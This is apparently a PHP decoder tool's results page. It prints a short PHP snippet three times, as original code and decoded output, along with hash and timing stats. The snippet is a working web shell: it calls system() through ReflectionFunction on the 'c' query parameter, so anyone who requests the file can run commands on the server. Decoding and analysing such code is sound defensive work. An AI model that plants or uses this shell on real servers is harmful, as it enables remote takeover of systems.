Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php$func = new ReflectionFunction("system");echo $func->invokeArgs(array("$_GET[c]"));?>..
Decoded Output download
<?php$func = new ReflectionFunction("system");echo $func->invokeArgs(array("$_GET[c]"));?>
Did this file decode correctly?
Original Code
<?php$func = new ReflectionFunction("system");echo $func->invokeArgs(array("$_GET[c]"));?>
Function Calls
None |
Stats
MD5 | 8861353f1aafe871bfac19c5787b269b |
Eval Count | 0 |
Decode Time | 117 ms |